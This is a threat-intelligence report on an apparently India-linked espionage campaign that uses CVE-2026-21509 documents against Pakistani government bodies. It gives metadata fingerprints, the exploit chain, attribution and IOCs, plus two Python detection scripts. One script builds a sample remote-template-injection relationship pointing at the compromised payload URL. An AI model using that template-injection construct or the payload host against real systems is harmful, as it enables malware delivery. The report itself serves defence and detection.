
MALDEV01, WarMachine, and a Compromised Pakistani Government Server: CVE-2026-21509 Gets a Second Life in South Asia

An India-linked actor adapts a European-targeted exploit for Pakistani government espionage, leaving their development machine name in every sample

Published April 3, 2026
Tags: cve-2026-21509, india, pakistan, apt, espionage, opsec-failure, sidewinder

CVE-2026-21509 is well-documented. Zscaler's ThreatLabz named the APT28 campaign exploiting it "Operation Neusploit." Trellix published a detailed analysis. CISA added it to the Known Exploited Vulnerabilities catalog. The targets: Central and Eastern European governments, EU institutions, NATO-adjacent organizations.

This is a different campaign. Different actor. Different targets. Same exploit.

An India-linked threat actor is using CVE-2026-21509 weaponized documents to target Pakistani government entities, and they left their development machine name -- MALDEV01 ("Malware Development 01") -- baked into the OLE metadata of every sample they produced.

The Developer Fingerprints

The samples contain unsanitized OLE metadata that reads like a confession:

  • Machine name: MALDEV01
  • Username: WarMachine
  • Author field: MALDE
  • Locale: English-India (0x4009 / deflang19465)

"MALDEV01" is not subtle. It's a machine name that tells you exactly what it's used for. The username "WarMachine" and author abbreviation "MALDE" (likely shortened from "MALDEV") complete the picture: a dedicated malware development workstation operated by someone who didn't think anyone would check the document properties.
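A triage scanner for these fingerprints, added here as an illustration and not part of the original report or the author's tooling. It checks a document for the quoted strings in both ASCII and UTF-16LE (Word keeps many of its internal strings, including the author table, as UTF-16LE), pulls the \deflang and \author values out of RTF-based samples, and labels the container type. The sample blobs at the bottom are constructed for the demonstration; placing the username in \operator and the machine name in body text is an assumption, since the report does not say which stream holds each value.

```python
"""Triage scanner for the developer fingerprints quoted in the report."""
import re

# Strings quoted in the report. The sample documents further down are constructed.
FINGERPRINTS = {
    "machine_name": b"MALDEV01",
    "username": b"WarMachine",
    "author": b"MALDE",  # prefix of MALDEV01, so it fires whenever the machine name does
}
# Locale values as the report lists them: 0x4009 (en-IN LCID) and the RTF \deflang19465 value.
REPORTED_LOCALES = {0x4009, 19465}

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
RTF_DEFLANG_RE = re.compile(rb"\\deflang(\d+)")
RTF_AUTHOR_RE = re.compile(rb"\\author\s*([^\\{}]*)")


def container_type(data: bytes) -> str:
    """Classify the outer format so an analyst knows which parser to reach for next."""
    if data.startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(b"PK\x03\x04"):
        return "ooxml"
    return "unknown"


def scan_document(data: bytes) -> dict:
    """Return which fingerprints appear (ASCII or UTF-16LE) plus any RTF locale/author values."""
    hits = {}
    for name, needle in FINGERPRINTS.items():
        if needle in data:
            hits[name] = "ascii"
        elif needle.decode("ascii").encode("utf-16-le") in data:
            hits[name] = "utf16le"
    # \deflangN carries the RTF default language ID in decimal.
    deflang = [int(m.group(1)) for m in RTF_DEFLANG_RE.finditer(data)]
    author = None
    m = RTF_AUTHOR_RE.search(data)
    if m:
        author = m.group(1).strip().decode("ascii", errors="replace")
    return {
        "container": container_type(data),
        "fingerprints": hits,
        "rtf_author": author,
        "rtf_deflang": deflang,
        "suspicious": bool(hits) or any(lcid in REPORTED_LOCALES for lcid in deflang),
    }


# Constructed samples (not the campaign's files): an RTF carrying the report's metadata
# values, and an OLE header followed by the machine name stored as UTF-16LE.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deflang19465"
    b"{\\info{\\author MALDE}{\\operator WarMachine}}"
    b"\\par MALDEV01 tets.LnK}"
)
SAMPLE_OLE = OLE_MAGIC + b"\x00" * 24 + "MALDEV01".encode("utf-16-le")
CLEAN_RTF = b"{\\rtf1\\ansi\\deflang1033{\\info{\\author Alice}}\\par Hello}"

if __name__ == "__main__":
    for label, blob in (("rtf", SAMPLE_RTF), ("ole", SAMPLE_OLE), ("clean", CLEAN_RTF)):
        print(label, scan_document(blob))
```

Point scan_document at any file read in binary mode; the UTF-16LE pass matters because a plain grep for "MALDEV01" misses the copy Word writes into its binary streams.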

The Targets

Two Pakistani government organizations appear in the campaign:

  • Sindh Integrated Emergency & Health Services (SIEHS) -- emergency response coordination for Pakistan's Sindh province
  • Punjab Safe Cities Authority (PSCA) -- urban surveillance and public safety infrastructure for Punjab province

The PSCA targeting is particularly concerning. The payload URL -- hxxps://sbis.psca.gop[.]pk/css/PDF-READER/PDF%20Viewer.application -- is hosted on a compromised Pakistani government server. The attacker gained access to PSCA's web infrastructure and is using it to serve malware to other Pakistani government targets. A compromised .gop.pk domain adds legitimacy to the delivery chain that an attacker-controlled domain cannot match.

The Exploit Chain

The attack follows the same CVE-2017-0199 → CVE-2017-11882 pattern documented in APT28's Operation Neusploit, but adapted for South Asian targeting:

Weaponized DOCX (SIEHS Document.doc / Agenda.doc)
  → CVE-2026-21509: Remote template injection
    → Fetches exploit payload from compromised .gop.pk server
      → CVE-2017-11882: Equation Editor shellcode execution
        → Backdoor deployment

Development artifacts reveal the iterative process: test samples contain the internal IP 192.168.171.236 (a development network address) and a file named tets.LnK -- a typo of "test.LnK" that confirms hasty testing.
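The remote-template stage of this chain, as a detection example added here rather than code from the report. It assumes the document pulls its template through the standard OOXML attachedTemplate relationship in word/_rels/settings.xml.rels with TargetMode="External", the same hook that CVE-2017-0199-era template injection abuses; the report does not describe the internals of CVE-2026-21509, so that mapping is an assumption. The check goes slightly beyond the single case in the text: it walks every .rels part, reports every external relationship, rates attachedTemplate, oleObject and frame targets that reach over http(s) as high risk, and matches the target host against the report's network IOC. Both documents it inspects are built in memory for the demonstration.

```python
"""Flag external OOXML relationships of the kind used for remote template injection."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{REL_NS}}}Relationship"
# Relationship types that make Word fetch and act on the target when the document opens.
HIGH_RISK_TYPES = {"attachedTemplate", "oleObject", "frame"}
# Compromised host named in the report (written defanged there as sbis.psca.gop[.]pk).
IOC_HOSTS = {"sbis.psca.gop.pk"}


def external_relationships(docx_bytes: bytes) -> list:
    """Walk every .rels part and return each TargetMode="External" relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(part))
            except ET.ParseError:
                continue  # a malformed rels part should not abort triage of the rest
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                url = urlparse(target)
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": short_type,
                    "target": target,
                    "remote": url.scheme.lower() in ("http", "https"),
                    "high_risk": short_type in HIGH_RISK_TYPES,
                    "known_ioc": (url.hostname or "").lower() in IOC_HOSTS,
                })
    return findings


def verdict(findings: list) -> str:
    """Collapse the findings into a triage label."""
    if any(f["known_ioc"] for f in findings):
        return "malicious"
    if any(f["high_risk"] and f["remote"] for f in findings):
        return "suspicious"
    return "clean"


def build_docx(settings_rels: bytes) -> bytes:
    """Build a minimal constructed .docx carrying the given settings.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("word/document.xml", b"<document/>")
        z.writestr("word/settings.xml", b"<settings/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


REL_HEAD = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            b'<Relationships xmlns="' + REL_NS.encode() + b'">\n')
TEMPLATE_TYPE = b"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
# Constructed: template fetched from the compromised host the report names.
MALICIOUS_RELS = (REL_HEAD + b'<Relationship Id="rId1" Type="' + TEMPLATE_TYPE +
                  b'" Target="https://sbis.psca.gop.pk/css/PDF-READER/PDF%20Viewer.application"'
                  b' TargetMode="External"/>\n</Relationships>')
# Constructed: a template on the local disk, which is ordinary for Word documents.
BENIGN_RELS = (REL_HEAD + b'<Relationship Id="rId1" Type="' + TEMPLATE_TYPE +
               b'" Target="file:///C:/Users/alice/Templates/Normal.dotm"'
               b' TargetMode="External"/>\n</Relationships>')

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        found = external_relationships(build_docx(rels))
        print(label, verdict(found), found)
```

The local-template case is kept deliberately: many corporate documents carry an external file:// attachedTemplate link, so alerting on every external relationship would drown the real hits. The remote flag plus the relationship type is what separates the two.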

Two Actor Clusters

The investigation identified a second cluster of samples exploiting CVE-2026-21509 with Chinese-language metadata:

  • Creator: qb.li
  • Locale: KSO 2052 (Chinese Simplified, Kingsoft WPS Office)

This suggests either shared exploit builder tooling between Indian and Chinese actors, or independent adoption of the same CVE-2026-21509 weaponization technique. The Chinese cluster targets different victims and uses different infrastructure, ruling out a single actor with multiple personas.

Attribution

MEDIUM-HIGH confidence: India-linked APT

The evidence constellation -- English-India locale, Pakistani government targets, compromised .gop.pk infrastructure, SideWinder/Confucius/Patchwork-consistent TTPs -- points to an Indian state-sponsored actor. The specific group cannot be definitively identified from the available samples, but the operational pattern is consistent with:

  • SideWinder (which we documented earlier this week targeting Azerbaijan-Russia diplomats)
  • Confucius (known for targeting Pakistani military and diplomatic entities)
  • Patchwork/Dropping Elephant (documented targeting Pakistani government organizations)

The CVE-2026-21509 adoption is notable because this vulnerability was previously associated exclusively with APT28 targeting European institutions. Its appearance in a South Asian espionage campaign suggests exploit sharing or independent rediscovery -- either way, defenders tracking CVE-2026-21509 exploitation should expand their geographic scope.

Indicators of Compromise

File Indicators

SHA256                  Filename             Description
Listed in full report   SIEHS Document.doc   Primary weaponized document
Listed in full report   cori.doc             Variant
Listed in full report   c9.doc               Variant
Listed in full report   design.docx          Chinese-cluster sample

Network Indicators

  • sbis.psca.gop[.]pk (compromised Pakistani government server)
  • 192.168.171.236 (development network, internal)

Behavioral Indicators

  • OLE metadata: machine name "MALDEV01", user "WarMachine", author "MALDE"
  • English-India locale (0x4009) in document properties
  • CVE-2026-21509 + CVE-2017-11882 exploit chain

Detection

Four YARA rules and four Suricata signatures are available on our GitHub:

